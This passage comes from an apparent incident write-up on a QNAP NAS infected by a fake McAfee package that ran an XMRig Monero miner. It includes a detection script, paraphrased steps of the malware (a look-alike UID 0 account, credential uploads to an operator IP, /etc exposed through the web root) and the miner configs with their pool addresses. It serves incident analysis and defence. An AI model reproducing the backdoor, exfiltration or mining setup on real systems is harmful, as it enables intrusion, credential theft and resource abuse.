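# the genuine QTS AirPlay session; QNAIRP/QPLAYER/MYMPNPSVR/LUNF are the
# script's. $1 is a file holding `screen -ls` output.
miner_screens() {
    grep -E '\.(MYMPNPSVR|QNAIRP|QPLAYER|LUNF)[[:space:](]' "$1"
}

# Constructed fixtures. \320\260 and \321\226 are the UTF-8 bytes of the
# Cyrillic letters а and і, i.e. the look-alike account name from the script.
make_fixtures() {
    d=$(mktemp -d)
    printf 'root:x:0:0:root:/root:/bin/sh\nadmin:x:0:0:administrator:/share/homes/admin:/bin/sh\n\320\260dm\321\226n:x:0:0:administrator:/share/homes/admin:/bin/sh\nhttpdusr:x:99:99::/home/httpd:/bin/false\n' > "$d/passwd"
    mkdir -p "$d/httpd" "$d/config/.qos_config/users/admin"
    ln -s /etc/ "$d/httpd/bfmfzyxqh7h38emut3kw"
    ln -s "$d/config" "$d/httpd/cgi-bin"          # a link that does not go to /etc
    printf '1:1:qper098\n' > "$d/config/.qos_config/users/admin/.qtoken"
    printf 'There are screens on:\n\t28017.MYMPNPSVR\t(Detached)\n\t21664.MYTRANSCODE\t(Detached)\n' > "$d/screens.txt"
    echo "$d"
}

# Stand-alone run over the fixtures.
FIX=$(make_fixtures)
echo "UID 0 accounts besides root/admin:"; rogue_uid0 "$FIX/passwd"
echo "non-ASCII account names:";           nonascii_users "$FIX/passwd"
echo "web root links into /etc:";          webroot_links_to_etc "$FIX/httpd"
planted_qtoken "$FIX/config" && echo "planted .qtoken present"
echo "miner screen sessions:";             miner_screens "$FIX/screens.txt"
rm -rf "$FIX"
```

The two passwd checks are deliberately independent: rogue_uid0 finds any extra UID 0 account regardless of how it is spelled, while nonascii_users finds look-alike names even if the attacker had picked a non-zero UID.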
That script sure looks kind of weird, and reading the start) branch top to bottom shows why. It greps /etc/config/shadow for an account named аdmіn and, if there is none, appends a UID 0 account with that name and a fixed password hash to /etc/shadow and /etc/passwd; the name only looks like admin (it is spelled with non-ASCII look-alike letters, which you can see by copying it out of the script), so it doesn't collide with the real admin and is easy to overlook in a listing. It then fetches the NAS's public IP from ident.me and uploads /etc/config/shadow, /etc/config/smbpasswd, admin's .qtoken and /etc/config/uLinux.conf to 109.95.47.67:45865, i.e. every credential on the box goes to the operator. It symlinks /etc/ into the web root as /home/httpd/bfmfzyxqh7h38emut3kw, which exposes those same config files through the built-in web server, and writes a fixed .qtoken for admin. Next it links the package's binaries into /usr/bin under service-like names (McAfee, McAfeeDisk, ntpd, qsyncsman), kills any running copies and starts everything under screen, choosing the .a/.aa configs when /proc/cpuinfo advertises aes and .n/.nn otherwise. Note that QNAIRP and QPLAYER, which looked like QNAP services in the first screen -ls, are started here too, running the package's own ntpd and qsyncsman (the genuine QTS AirPlay session in QMediaService.sh is named QAIRP). Finally it reports either the process list or the miner's -V output back to the same host, downloads a second stage to /tmp/lun.sh, runs it under screen and deletes the file, so that stage can't be recovered from disk. What happens if we run one of those commands?
[~] # ls /usr/bin/McAfee
/usr/bin/McAfee@
[~] # ls /usr/bin/McAfee -l
lrwxrwxrwx 1 admin administrators 41 2018-02-08 00:45 /usr/bin/McAfee -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee*
[~] # ls /share/CACHEDEV1_DATA/.qpkg/
autorun@ helpdesk/ McAfee/ QNAP_Diagnostic_Tool/ QsyncServer/ StorageExpansion/
[~] # ls /share/CACHEDEV1_DATA/.qpkg/McAfee/
McAfee* McAfeeDisk* McAfee.sh* mscaner.a mscaner.aa mscaner.b mscaner.bb mscaner.n mscaner.nn mscaner.x mscaner.xx ntpd* qsyncsman*
[~] # /usr/sbin/screen -dmS MYMPNPSVR /usr/bin/McAfee -c /usr/bin/mscaner.a
[~] # screen -ls
There are screens on:
5482.MYMPNPSVR (Detached)
4287.QNAIRP (Detached)
27998.QPLAYER (Detached)
27995.QNAIRP (Detached)
21664.MYTRANSCODE (Detached)
5 Sockets in /tmp/screens/S-admin.
[~] # screen -x 5482
[screen is terminating]
Again you can't see it, but this confirmed that this command is what starts the mining. Note the extra QNAIRP session (4287) next to the original 27995: it was most likely started when the if $(...) loop earlier executed the first screen line out of McAfee.sh, which is a good reason to hash and inspect suspect binaries rather than run them on the box. But why? Isn't this an antivirus program?? Let's dig a little further into the package directory...
[~] # ls -l /usr/bin/McAfee
lrwxrwxrwx 1 admin administrators 41 2018-02-08 00:45 /usr/bin/McAfee -> /share/CACHEDEV1_DATA/.qpkg/McAfee/McAfee*
[~] # ls -lrta /share/CACHEDEV1_DATA/.qpkg/McAfee/
total 4500
-rw-r--r-- 1 admin administrators 3769 2017-08-08 21:07 .qpkg_icon_gray.gif
-rw-r--r-- 1 admin administrators 7958 2017-08-08 21:07 .qpkg_icon.gif
-rw-r--r-- 1 admin administrators 7958 2017-08-08 21:07 .qpkg_icon_80.gif
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:17 mscaner.aa
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.n
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:18 mscaner.a
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:19 mscaner.nn
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:20 mscaner.x
-rw-r--r-- 1 admin administrators 534 2018-01-25 14:21 mscaner.xx
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.bb
-rw-r--r-- 1 admin administrators 529 2018-01-25 14:22 mscaner.b
-rwxrwxr-x 1 admin administrators 1174680 2018-01-25 16:16 McAfeeDisk*
-rwxrwxr-x 1 admin administrators 526432 2018-02-02 08:36 McAfee*
-rwxrwxr-x 1 admin administrators 1460052 2018-02-04 09:41 ntpd*
-rwxrwxr-x 1 admin administrators 1361200 2018-02-04 10:56 qsyncsman*
-rwxr-xr-x 1 admin administrators 4426 2018-02-04 18:29 McAfee.sh*
-rw-r--r-- 1 admin administrators 215 2018-02-04 20:08 .list
drwxr-xr-x 2 admin administrators 4096 2018-02-04 20:08 ./
-rwxr-xr-x 1 admin administrators 780 2018-02-04 20:08 .uninstall.sh*
drwxrwxrwx 8 admin administrators 4096 2018-02-08 00:46 ../
[~] # cd /share/CACHEDEV1_DATA/.qpkg/McAfee/
[/share/CACHEDEV1_DATA/.qpkg/McAfee] # cat mscaner.a
{
"algo": "cryptonight",
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"log-file": null,
"max-cpu-usage": 75,
"print-time": 60,
"retries": 3,
"retry-pause": 5,
"safe": false,
"syslog": false,
"threads": null,
"pools": [
{
"url": "109.95.47.68:36487",
"user": "xxx",
"pass": "x",
"keepalive": true,
"nicehash": false
}
]
}
The other seven mscaner.* files (cat on each) are identical to mscaner.a except for two values, the algorithm and the pool port; all pools are on 109.95.47.68, user "xxx", pass "x", donate-level 0, max-cpu-usage 75:

  file         algo              pool
  mscaner.a    cryptonight       109.95.47.68:36487
  mscaner.aa   cryptonight       109.95.47.68:36488
  mscaner.n    cryptonight       109.95.47.68:36587
  mscaner.nn   cryptonight       109.95.47.68:36588
  mscaner.b    cryptonight       109.95.47.68:36887
  mscaner.bb   cryptonight       109.95.47.68:36888
  mscaner.x    cryptonight-lite  109.95.47.68:36687
  mscaner.xx   cryptonight-lite  109.95.47.68:36688
These are XMRig configuration files (algo, av, donate-level, max-cpu-usage, nicehash and pools are XMRig's keys), and CryptoNight is the proof-of-work hash Monero used at the time, designed to be mined on ordinary CPUs; cryptonight-lite in mscaner.x/.xx is the same family with a smaller memory footprint. Each binary gets two configs with adjacent pool ports, donate-level is 0 and the miner is capped at 75% CPU. The init script picks .a/.aa when /proc/cpuinfo advertises aes and .n/.nn otherwise, and the only difference between those pairs on disk is the port. That shouldn't be there! Let's remove that McAfee app (using the GUI)... Keep in mind that uninstalling only removes the package directory shown below: nothing on this page shows the look-alike UID 0 account in /etc/passwd and /etc/shadow, the /home/httpd symlink to /etc or the planted .qtoken being reverted (whether .uninstall.sh does that isn't shown), and /etc/config/shadow and smbpasswd were already uploaded, so every password on the NAS needs changing regardless.
[~] # ls /share/CACHEDEV1_DATA/.qpkg/ -lrt
total 16
drwxr-x--- 3 admin administrators 4096 2014-12-01 17:23 QNAP_Diagnostic_Tool/
lrwxrwxrwx 1 admin administrators 9 2015-02-19 12:23 autorun -> /dev/null
drwx------ 3 admin administrators 4096 2017-04-18 07:24 StorageExpansion/
drwxr-xr-x 7 admin administrators 4096 2017-12-29 17:00 QsyncServer/
drwxr-xr-x 2 admin administrators 4096 2018-02-08 00:44 helpdesk/
So it's gone (note I haven't tried a reboot yet though). But what happens if we reinstall the McAfee app (again using the GUI)?
[~] # ls /share/CACHEDEV1_DATA/.qpkg/ -lrt
total 20
drwxr-x--- 3 admin administrators 4096 2014-12-01 17:23 QNAP_Diagnostic_Tool/
lrwxrwxrwx 1 admin administrators 9 2015-02-19 12:23 autorun -> /dev/null
drwx------ 3 admin administrators 4096 2017-04-18 07:24 StorageExpansion/
drwxr-xr-x 7 admin administrators 4096 2017-12-29 17:00 QsyncServer/
drwxr-xr-x 2 admin administrators 4096 2018-02-08 00:44 helpdesk/
drwxr-xr-x 7 1000 1000 4096 2018-02-08 15:49 MCAFEE_QNAP/
[~] # ls /share/CACHEDEV1_DATA/.qpkg/MCAFEE_QNAP/
bin@ dat/ lib@ lib32/ lib64/ mcafee_qnap.conf* mcafee_qnap.sh* target/ tmp/
[~] # cat /share/CACHEDEV1_DATA/.qpkg/MCAFEE_QNAP/mcafee_qnap.sh
#!/bin/sh
RETVAL=0
QPKG_NAME="MCAFEE_QNAP"
dbgprint()
{
local msg="$1"
#echo "mcafee_qnap.sh: $msg" >> "/tmp/log_antivirus.txt"
echo "$msg"
}
#/sbin/log_tool -t2 -uSystem -p127.0.0.1 -mlocalhost -a "MCAFEE_QNAP_ENABLED=`/sbin/getcfg $QPKG_NAME Enable -u -d FALSE -f /etc/config/qpkg.conf` $0 $1"
_exit()
{
/bin/echo -e "Error: $*"
exit 1
}
find_base()
{
# Determine BASE installation location according to smb.conf
publicdir=`/sbin/getcfg Public path -f /etc/config/smb.conf`
if [ ! -z $publicdir ] && [ -d $publicdir ];then
publicdirp1=`/bin/echo $publicdir | /bin/cut -d "/" -f 2`
publicdirp2=`/bin/echo $publicdir | /bin/cut -d "/" -f 3`
publicdirp3=`/bin/echo $publicdir | /bin/cut -d "/" -f 4`
if [ ! -z $publicdirp1 ] && [ ! -z $publicdirp2 ] && [ ! -z $publicdirp3 ]; then
[ -d "/${publicdirp1}/${publicdirp2}/Public" ] && QPKG_BASE="/${publicdirp1}/${publicdirp2}"
fi
fi
# Determine BASE installation location by checking where the Public folder is.
if [ -z $QPKG_BASE ]; then
for datadirtest in /share/HDA_DATA /share/HDB_DATA /share/HDC_DATA /share/HDD_DATA /share/HDE_DATA /share/HDF_DATA /share/HDG_DATA /share/HDH_DATA /share/MD0_DATA /share/MD1_DATA /share/MD2_DATA /share/MD3_DATA; do
[ -d $datadirtest/Public ] && QPKG_BASE="$datadirtest/Public"
done
fi
if [ -z $QPKG_BASE ] ; then
echo "The Public share not found."
_exit 1
fi
QPKG_INSTALL_PATH="${QPKG_BASE}/.qpkg"
QPKG_DIR="${QPKG_INSTALL_PATH}/${QPKG_NAME}"
}
find_base
#source "$QPKG_DIR/mcafee_qnap.conf"
ENABLED="`/sbin/getcfg $QPKG_NAME Enable -u -d FALSE -f /etc/config/qpkg.conf`"
case "$1" in
start)
dbgprint "Generate symbolic linke /mcafee"
/bin/ln -sf $QPKG_DIR /mcafee
$0 clean
# Misora Hsu, 2016/08/25: stop install if QTS version was older than 4.2.1
QTSV=$(/sbin/getcfg -f /etc/config/uLinux.conf "System" "Version")
QTSVi=${QTSV//./}
if [ $QTSVi -lt 430 ]; then
msg="Your QTS is older than 4.3.0, use 32-bits binary."
/bin/ln -sf lib32 /mcafee/lib
/bin/ln -sf target/bin32 /mcafee/bin
else
msg="Your QTS is newer than 4.3.0, use 64-bits binary."
/bin/ln -sf lib64 /mcafee/lib
/bin/ln -sf target/bin64 /mcafee/bin
fi
echo $msg
/bin/touch /etc/config/antivirus.global
/bin/touch /etc/config/antivirus.jobs
/bin/touch /etc/config/antivirus.quarantine
/bin/touch /tmp/antivirus.lock
/bin/touch /tmp/antivirus.jobs
#Sometimes we insert firmware files into QPKG for debugging, then replcae original firmware files.
#The official QPKG should not include these files.
cat /usr/lib/libuLinux_qlicense.so.0.0 | grep Get_Status_and_ExpireDate_For_Appid_Hash 2>/dev/null 1>/dev/null
if [ $? != 0 ]; then
dbgprint "[McAfee] Fail to start. libuLinux_qlicense.so.0.0 is too old. Please update the firmware"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Fail to start. libuLinux_qlicense.so.0.0 is too old. Please update the firmware"
else
if [ -f $QPKG_DIR/target/appRequest.cgi ];then
[ -f /home/httpd/cgi-bin/application/appRequest_MCAFEE_ORG.cgi ] || /bin/mv /home/httpd/cgi-bin/application/appRequest.cgi /home/httpd/cgi-bin/application/appRequest_MCAFEE_ORG.cgi
/bin/cp -f $QPKG_DIR/target/appRequest.cgi /home/httpd/cgi-bin/application/
dbgprint "Replace firmware file: /home/httpd/cgi-bin/application/appRequest.cgi"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /home/httpd/cgi-bin/application/appRequest.cgi"
fi
if [ -f $QPKG_DIR/src-firmware/antivirus.sh ];then
[ -f /etc/init.d/antivirus_MCAFEE_ORG.sh ] || /bin/mv /etc/init.d/antivirus.sh /etc/init.d/antivirus_MCAFEE_ORG.sh
/bin/cp -f $QPKG_DIR/src-firmware/antivirus.sh /etc/init.d/
dbgprint "Replace firmware file: /etc/init.d/antivirus.sh"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /etc/init.d/antivirus.sh"
fi
if [ -f $QPKG_DIR/src-firmware/antivirus.js ];then
[ -f /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus_MCAFEE_ORG.js ] || /bin/mv /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus_MCAFEE_ORG.js
/bin/cp -f $QPKG_DIR/src-firmware/antivirus.js /home/httpd/cgi-bin/apps/systemPreferences/functions/
dbgprint "Replace firmware file: /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js"
/sbin/log_tool -t1 -uSystem -p127.0.0.1 -mlocalhost -a "[McAfee] Replace firmware file: /home/httpd/cgi-bin/apps/systemPreferences/functions/antivirus.js"
fi
fi
RETVAL=0
;;
stop)
dbgprint "Remove symbolic linke /mcafee"
$0 clean
#/bin/rm /mcafee/lib
#/bin/rm /mcafee/bin
/bin/rm /mcafee
#/sbin/setcfg "Antivirus" "AntivirusEngine" "LEGACY" -f "/etc/config/antivirus.global"
RETVAL=0
;;
clean)
[ -L "/mcafee/lib/lib32" ] && /bin/rm /mcafee/lib/lib32
[ -L "/mcafee/lib/lib64" ] && /bin/rm /mcafee/lib/lib64
[ -L "/mcafee/lib" ] && /bin/rm /mcafee/lib
[ -L "/mcafee/bin" ] && /bin/rm /mcafee/bin
;;
restart)
$0 stop
$0 start
RETVAL=0
;;
*)
echo "Usage: $0 {start|stop|restart}"
exit 1
esac
exit $RETVAL
It looks very different! Much more like what you would expect. So it appears that whatever exploit was used to gain access to the system hijacked this app so the miner's CPU load would pass for normal antivirus activity. After all, what antivirus program isn't a resource hog? Well, that was interesting, but McAfee is basically a scam anyways, so let's uninstall it (again with the GUI). QNAP has its own integrated antivirus and Malware Remover anyways. Hopefully QNAP has patched the vulnerability (possibly this one, though not everything matches) used to gain access to the system in the first place, and we have deleted the suspicious second 'admin' account revealed by looking at the Users panel in the GUI and/or checking the passwd/shadow files with cat /etc/passwd or cat /etc/shadow, so we can hope this is the end of it. But only time will tell... So better to just protect the device behind a firewall or NAT if you can.